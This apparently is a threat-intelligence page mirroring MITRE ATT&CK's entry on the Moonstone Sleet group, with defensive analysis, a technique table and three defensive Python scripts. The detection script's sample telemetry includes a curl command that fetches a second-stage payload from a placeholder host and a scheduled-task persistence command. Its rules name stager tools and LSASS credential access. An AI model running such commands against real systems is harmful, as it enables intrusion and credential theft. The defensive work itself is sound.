G1036: Moonstone Sleet
Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game.[1]
Analyst context for executives and security teams
Moonstone Sleet matters because ATT&CK describes a group that combines social engineering infrastructure, fake companies/personas, financially motivated activity, and espionage-oriented operations. For leaders, the practical risk is not one single malware family or platform; it is whether the organization can validate people, files, software sources, and post-compromise behavior before an intrusion becomes credential theft, persistence, command-and-control, or ransomware impact.
Executive priority
Prioritize this as a readiness test across identity, SOC monitoring, incident response, and third-party trust. Executives should ask whether recruiting, vendor, developer, and business-development workflows can spot fake personas and suspicious files; whether SOC coverage includes credential access and persistence behaviors; and whether ransomware resilience covers Windows, Linux, VMware ESXi, and cloud/IaaS systems where relevant to local infrastructure. The ATT&CK relationships make this useful for control prioritization and audit evidence: prove you can detect and respond to phishing, malicious files, software supply chain concerns, LSASS access, scheduled tasks, service execution, registry run keys, web-based C2, tool transfer, and data encryption activity.
Technical view
ATT&CK does not provide a dedicated detection section for Moonstone Sleet, so defenders should validate coverage from the related techniques. Build detections around the chain implied by the relationships: resource development using domains, VPSs, email accounts, and social media accounts; initial access through spearphishing attachments, third-party services, malicious files, and possible software supply chain compromise; execution via user-opened files, services, or scheduled tasks; credential access against LSASS; discovery of users, browsers, systems, and network configuration; persistence through scheduled tasks and run keys; obfuscation, embedded or encoded payloads, and deobfuscation; C2 over web protocols; ingress tool transfer; and encryption for impact. Treat the Qilin relationship as a ransomware-context signal, while avoiding assumptions that every Moonstone Sleet case will use that software.
Likely telemetry
- Email security and attachment detonation results for spearphishing attachments
- Logs from collaboration, social, or third-party messaging services used for business communication
- DNS, proxy, web gateway, and firewall logs for new domains, VPS-hosted infrastructure, HTTP/S or WebSocket-like C2, and tool downloads
- Endpoint process creation, command-line, parent-child process, and file-write telemetry across monitored operating systems
- Windows security, Sysmon/EDR, service control manager, scheduled task, and registry autorun telemetry
Detection direction
- Map existing detections to the related ATT&CK techniques rather than relying on the group name alone.
- Validate visibility for third-party service phishing; many organizations monitor email better than social media, collaboration, or external messaging workflows.
- Tune phishing and malicious-file detections for business-context lures, fake companies, and functioning applications or games that may appear legitimate.
- Baseline and alert on unusual scheduled task creation, service execution, registry run key changes, and suspicious child processes from user-opened files.
- Harden and monitor for LSASS access attempts, especially when paired with discovery commands or lateral movement preparation.
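The behavior chain laid out under "Technical view" and the alerting points in the list above can be expressed as a handful of rules over endpoint telemetry. The following is an added example, not code from ATT&CK, Microsoft, or Glexia: it runs five rules (user-facing app spawning a stager, scheduled task creation from a user-writable parent, Run key writes, service installs from user-writable paths, and non-system LSASS access with read rights) over constructed event records. The records only resemble normalized Sysmon and Windows Security fields; the field names, paths and allowlists are assumptions to tune per environment.

```python
"""Behavior-chain detections for the Moonstone Sleet relationships above.

Added example; not code from ATT&CK, Microsoft, or Glexia. Event records are
constructed to resemble normalized Sysmon / Windows event fields; the field
names (event_id, image, parent_image, command_line, target_object, image_path,
target_image, granted_access) and every path below are assumptions.
"""

# Applications that open user-delivered files (the T1204.002 lure stage).
USER_FACING_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                    "acrord32.exe", "putty.exe"}
# Children that commonly fetch or launch a follow-on stage (T1105 / T1071.001).
STAGERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe",
           "wscript.exe", "mshta.exe", "cmd.exe"}
# Directories a standard user can write to; loaders staged here are suspect.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
# Images expected to open LSASS on a healthy host (assumption: tune locally).
LSASS_BENIGN = {"svchost.exe", "csrss.exe", "wininit.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010  # access right needed to read credential material


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def check_event(ev):
    """Return (technique_id, reason) when a rule fires, else None."""
    eid = ev.get("event_id")
    if eid == 1:  # Sysmon: process creation
        img, parent = basename(ev["image"]), basename(ev["parent_image"])
        cmd = ev.get("command_line", "").lower()
        if parent in USER_FACING_APPS and img in STAGERS:
            return ("T1204.002", f"{parent} spawned {img}")
        if img == "schtasks.exe" and "/create" in cmd and in_user_writable(ev["parent_image"]):
            return ("T1053.005", "schtasks /create from user-writable parent")
        if img == "sc.exe" and " create " in cmd and in_user_writable(ev["parent_image"]):
            return ("T1569.002", "sc create from user-writable parent")
    elif eid == 13:  # Sysmon: registry value set
        if "\\currentversion\\run" in ev["target_object"].lower() and in_user_writable(ev["image"]):
            return ("T1547.001", "Run key written by image in user-writable path")
    elif eid == 7045:  # System log: service installed
        if in_user_writable(ev["image_path"]):
            return ("T1569.002", f"service {ev['service_name']} from user-writable path")
    elif eid == 10:  # Sysmon: process access
        if basename(ev["target_image"]) == "lsass.exe":
            access = int(ev["granted_access"], 16)
            if access & PROCESS_VM_READ and basename(ev["image"]) not in LSASS_BENIGN:
                return ("T1003.001", f"{basename(ev['image'])} opened lsass with VM_READ")
    return None


def run_detections(events):
    hits = []
    for i, ev in enumerate(events):
        hit = check_event(ev)
        if hit:
            hits.append((i, hit[0], hit[1]))
    return hits


def techniques_hit(events):
    return sorted({tid for _, tid, _ in run_detections(events)})


# Constructed sample telemetry (placeholders, not real indicators).
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r"curl.exe -o C:\Users\u\AppData\Local\Temp\stage2.bin http://placeholder.invalid/p"},
    {"event_id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Users\u\AppData\Local\Temp\setup.exe",
     "command_line": r"schtasks /create /sc onlogon /tn Updater /tr C:\Users\u\AppData\Roaming\svc.exe"},
    {"event_id": 13, "image": r"C:\Users\u\AppData\Local\Temp\setup.exe",
     "target_object": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"event_id": 7045, "service_name": "UpdaterSvc", "image_path": r"C:\ProgramData\loader.exe"},
    {"event_id": 10, "image": r"C:\Users\u\AppData\Local\Temp\setup.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"event_id": 10, "image": r"C:\Windows\System32\svchost.exe",           # benign
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1000"},
    {"event_id": 1, "image": r"C:\Windows\System32\notepad.exe",            # benign
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, tid, reason in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {tid} - {reason}")
```

Each rule fires on one stage, so the value for triage comes from correlating hits on the same host within a short window: a user-facing app spawning curl, followed by a Run key write and an LSASS open from the same dropped image, is the chain the group description implies, while any single hit in isolation will also catch admin tooling and needs the allowlists tuned.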
Mitigation priorities
- Start with identity and social-engineering controls: phishing-resistant MFA where practical, strong account recovery controls, user reporting paths, and verification procedures for new vendors, recruiters, developers, and business contacts.
- Reduce malicious-file execution risk with attachment controls, sandboxing, application control, least privilege, and restrictions on untrusted executables/scripts.
- Strengthen software supply chain governance: verify trusted sources, signed releases, update mechanisms, and change control for software introduced into the environment.
- Protect credentials by limiting local admin rights, hardening LSASS exposure, and monitoring privileged account use.
- Reduce persistence opportunities by controlling scheduled task, service, and autorun creation privileges and reviewing deviations from baseline.
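The software supply chain item above ("verify trusted sources, signed releases, update mechanisms") is the control that would have stopped the trojanized installer case in the technique table. As an added example, not code from the page, MITRE, or any vendor, the script below automates two of those checks before a download is admitted: the source host must be on an allowlist, and the file's SHA-256 must match a manifest obtained out of band (sha256sum-style lines). The hostnames, file names, manifest and file contents are constructed placeholders, not real release data.

```python
"""Integrity gate for software introduced into the environment.

Added example, not the page's, MITRE's or a vendor's code. Checks the download
host against an allowlist and the file hash against an out-of-band manifest.
All hosts, names and bytes below are constructed placeholders.
"""
import hashlib
from urllib.parse import urlparse

# Assumption: an internal allowlist of release hosts owned by change control.
TRUSTED_HOSTS = {"releases.vendor-placeholder.invalid"}


def parse_manifest(text):
    """Parse sha256sum-style '<hex>  <name>' lines into {name: hexdigest}."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition("  ")
        name = name.strip().lstrip("*")  # '*' marks binary mode in sha256sum output
        digest = digest.lower()
        malformed = (not sep or not name or len(digest) != 64
                     or any(c not in "0123456789abcdef" for c in digest))
        if malformed:
            raise ValueError(f"manifest line {lineno} is malformed: {raw!r}")
        entries[name] = digest
    return entries


def verify_download(url, filename, data, manifest):
    """Return (ok, reasons); ok is True only when every check passes."""
    reasons = []
    host = (urlparse(url).hostname or "").lower()
    if host not in TRUSTED_HOSTS:
        reasons.append(f"source host {host!r} is not allowlisted")
    expected = manifest.get(filename)
    actual = hashlib.sha256(data).hexdigest()
    if expected is None:
        reasons.append(f"no manifest entry for {filename!r}")
    elif expected != actual:
        reasons.append("sha256 mismatch: file differs from the published release")
    return (not reasons, reasons)


# Constructed sample: a "genuine" installer and a tampered copy of it.
GENUINE = b"MZ-placeholder genuine installer bytes\n"
TAMPERED = GENUINE + b"extra stage appended to the installer\n"
MANIFEST = parse_manifest(
    "# constructed manifest, fetched out of band from the vendor's signed page\n"
    f"{hashlib.sha256(GENUINE).hexdigest()}  installer-placeholder.exe\n"
)
TRUSTED_URL = "https://releases.vendor-placeholder.invalid/v1/installer-placeholder.exe"
LOOKALIKE_URL = "https://releases.vendor-placeholder-cdn.invalid/v1/installer-placeholder.exe"

if __name__ == "__main__":
    cases = ((TRUSTED_URL, GENUINE), (TRUSTED_URL, TAMPERED), (LOOKALIKE_URL, GENUINE))
    for url, blob in cases:
        ok, reasons = verify_download(url, "installer-placeholder.exe", blob, MANIFEST)
        print("ALLOW" if ok else "BLOCK", url, reasons)
```

The hash check only adds assurance if the manifest is obtained through a channel the download host does not control; a manifest fetched from the same page as a tampered installer proves nothing. Pair this with verification of the vendor's code signature, which depends on platform tooling and is not shown here.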
Analyst notes and limits
This take is based on ATT&CK G1036, its official description, the Microsoft external reference, and the supplied ATT&CK relationships. The most decision-useful feature is the breadth of behaviors: persona/resource development, phishing and malicious files, supply chain concerns, credential access, persistence, C2, tool transfer, obfuscation, and ransomware impact context. Local risk depends on whether the organization’s business processes expose employees to external personas and whether telemetry covers the related platforms and techniques.
MITRE provides no official detection text for this group, and the group object itself lists no platforms or tactics. Platform references here come only from the related software and techniques. This summary does not assert current activity against any specific sector, customer, or environment, and it does not guarantee detection coverage without local telemetry validation.
Moonstone Sleet
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1587.001 | Malware Sub-technique | Moonstone Sleet has developed custom malware, including a malware delivery mechanism masquerading as a legitimate game.[1] |
| Enterprise | T1033 | System Owner/User Discovery | Moonstone Sleet deployed various malware such as YouieLoader that can perform system user discovery actions.[1] |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.[1] |
| Enterprise | T1585.002 | Email Accounts Sub-technique | Moonstone Sleet has created email accounts to interact with victims, including for phishing purposes.[1] |
| Enterprise | T1589.002 | Email Addresses Sub-technique | Moonstone Sleet gathered victim email address information for follow-on phishing activity.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Moonstone Sleet delivered payloads using multiple rounds of obfuscation and encoding to evade defenses and analysis.[1] |
| Enterprise | T1591 | Gather Victim Org Information | Moonstone Sleet has gathered information on victim organizations through email and social media interaction.[1] |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Moonstone Sleet used scheduled tasks for program execution during initial access to victim machines.[1] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Moonstone Sleet used registry run keys for process execution during initial victim infection.[1] |
| Enterprise | T1204.002 | Malicious File Sub-technique | Moonstone Sleet relied on users interacting with malicious files, such as a trojanized PuTTY installer, for initial execution.[1] |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Moonstone Sleet delivered various payloads to victims as spearphishing attachments.[1] |
| Enterprise | T1027 | Obfuscated Files or Information | Moonstone Sleet delivers encrypted payloads in pieces that are then combined together to form a new portable executable (PE) file during installation.[1] |
| Enterprise | T1583.003 | Virtual Private Server Sub-technique | Moonstone Sleet registered virtual private servers to host payloads for download.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | Moonstone Sleet retrieved a final stage payload from command and control infrastructure during initial installation on victim systems.[1] |
| Enterprise | T1016 | System Network Configuration Discovery | Moonstone Sleet has gathered information on victim network configuration.[1] |
| Enterprise | T1598.003 | Spearphishing Link Sub-technique | Moonstone Sleet used spearphishing messages containing items such as tracking pixels to determine if users interacted with malicious messages.[1] |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | Moonstone Sleet retrieved credentials from LSASS memory.[1] |
| Enterprise | T1608.001 | Upload Malware Sub-technique | Moonstone Sleet staged malicious capabilities online for follow-on download by victims or malware.[1] |
| Enterprise | T1598 | Phishing for Information | Moonstone Sleet has interacted with victims to gather information via email.[1] |
| Enterprise | T1195.002 | Compromise Software Supply Chain Sub-technique | Moonstone Sleet has distributed a trojanized version of PuTTY software for initial access to victims.[1] |
| Enterprise | T1569.002 | Service Execution Sub-technique | Moonstone Sleet used intermediate loader malware such as YouieLoader and SplitLoader that create malicious services.[1] |
| Enterprise | T1583.001 | Domains Sub-technique | Moonstone Sleet registered domains to develop effective personas for fake companies used in phishing activity.[1] |
| Enterprise | T1217 | Browser Information Discovery | Moonstone Sleet deployed malware such as YouieLoader capable of capturing victim system browser information.[1] |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | Moonstone Sleet has used social media services to spearphish victims to deliver trojanized software.[1] |
| Enterprise | T1486 | Data Encrypted for Impact | Moonstone Sleet has deployed ransomware in victim environments.[1] |
| Enterprise | T1585.001 | Social Media Accounts Sub-technique | Moonstone Sleet has created social media accounts to interact with victims.[1] |
| Enterprise | T1587 | Develop Capabilities | Moonstone Sleet developed malicious npm packages for delivery to or retrieval by victims.[1] |
| Enterprise | T1082 | System Information Discovery | Moonstone Sleet has gathered information on victim systems.[1] |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Moonstone Sleet has used encrypted payloads within files for follow-on execution and defense evasion.[1] |
| Enterprise | T1027.009 | Embedded Payloads Sub-technique | Moonstone Sleet embedded payloads in trojanized software for follow-on execution.[1] |
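The "Detection direction" guidance earlier on this page is to map existing detections to these technique IDs rather than to the group name. As an added example, not Glexia's or MITRE's code, the script below parses a subset of the table rows (copied from this page) and compares each ID against a constructed inventory of local detection rules, so the output is a gap list that can serve as audit evidence. The rule names are assumptions; a sub-technique whose parent technique has a rule is reported as partial rather than covered, since a parent-level rule rarely carries the sub-technique's specifics.

```python
"""Coverage-gap report for the technique table above.

Added example, not Glexia's or MITRE's code. Rows below are copied from the
page's "Techniques used" table (an illustrative subset); the rule inventory is
a constructed assumption standing in for a local SIEM/EDR rule export.
"""
import re

TABLE_ROWS = """\
| Enterprise | T1587.001 | Malware Sub-technique | Moonstone Sleet has developed custom malware, including a malware delivery mechanism masquerading as a legitimate game.[1] |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.[1] |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Moonstone Sleet used scheduled tasks for program execution during initial access to victim machines.[1] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Moonstone Sleet used registry run keys for process execution during initial victim infection.[1] |
| Enterprise | T1204.002 | Malicious File Sub-technique | Moonstone Sleet relied on users interacting with malicious files, such as a trojanized PuTTY installer, for initial execution.[1] |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Moonstone Sleet delivered various payloads to victims as spearphishing attachments.[1] |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | Moonstone Sleet retrieved credentials from LSASS memory.[1] |
| Enterprise | T1195.002 | Compromise Software Supply Chain Sub-technique | Moonstone Sleet has distributed a trojanized version of PuTTY software for initial access to victims.[1] |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | Moonstone Sleet has used social media services to spearphish victims to deliver trojanized software.[1] |
| Enterprise | T1486 | Data Encrypted for Impact | Moonstone Sleet has deployed ransomware in victim environments.[1] |
| Enterprise | T1587 | Develop Capabilities | Moonstone Sleet developed malicious npm packages for delivery to or retrieval by victims.[1] |
"""

# Assumption: local rule inventory keyed by ATT&CK ID (rule names are made up).
LOCAL_RULES = {
    "T1566.001": ["mail-attachment-detonation-verdict"],
    "T1566": ["user-reported-phish-triage"],          # parent-level rule only
    "T1053.005": ["schtasks-create-from-user-dir"],
    "T1547.001": ["run-key-write-by-unsigned-image"],
    "T1003.001": ["lsass-access-nonsystem-image"],
}

ROW_RE = re.compile(
    r"^\|\s*(?P<domain>[^|]+?)\s*\|\s*(?P<id>T\d{4}(?:\.\d{3})?)\s*\|\s*(?P<name>[^|]+?)\s*\|"
)


def parse_rows(text):
    """Extract (technique_id, name) from markdown table rows; skip non-rows."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((m["id"], m["name"]))
    return rows


def coverage_report(rows, rules):
    """Bucket each technique as covered, partial (parent rule only) or uncovered."""
    report = {"covered": [], "partial": [], "uncovered": []}
    for tid, _name in rows:
        parent = tid.split(".")[0]
        if tid in rules:
            report["covered"].append(tid)
        elif parent != tid and parent in rules:
            report["partial"].append(tid)
        else:
            report["uncovered"].append(tid)
    for bucket in report.values():
        bucket.sort()
    return report


if __name__ == "__main__":
    rows = parse_rows(TABLE_ROWS)
    for bucket, ids in coverage_report(rows, LOCAL_RULES).items():
        print(f"{bucket:9s} ({len(ids):2d}): {', '.join(ids)}")
```

Run against the full table and the real rule export, the "uncovered" bucket is the prioritization list; the "partial" bucket is where a parent rule should be checked against the sub-technique's specifics (here, whether a phishing rule that keys on email would see a social media lure at all).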
Groups, software, and campaigns
S1242: Qilin
Qilin is a ransomware family operated as a ransomware-as-a-service (RaaS) that has been active since at least 2022. It includes variants written in Go and Rust capable of targeting Windows, Linux, and VMware ESXi environments. Qilin shares functionality overlaps with Black Basta, REvil, and BlackCat ransomware. Qilin affiliates have targeted multiple entities worldwide with the majority of victims in the US, France, Canada, and the UK, primarily in the manufacturing, technology, financial services, and healthcare sectors.[1][2][3][4][5]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 63c67cbad290… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Microsoft Moonstone Sleet 2024: Microsoft Threat Intelligence. (2024, May 28). Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks. Retrieved August 26, 2024.
[2] Storm-1789 (alias; citation: Microsoft Moonstone Sleet 2024).
[3] mitre-attack G1036 (MITRE ATT&CK source record).
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.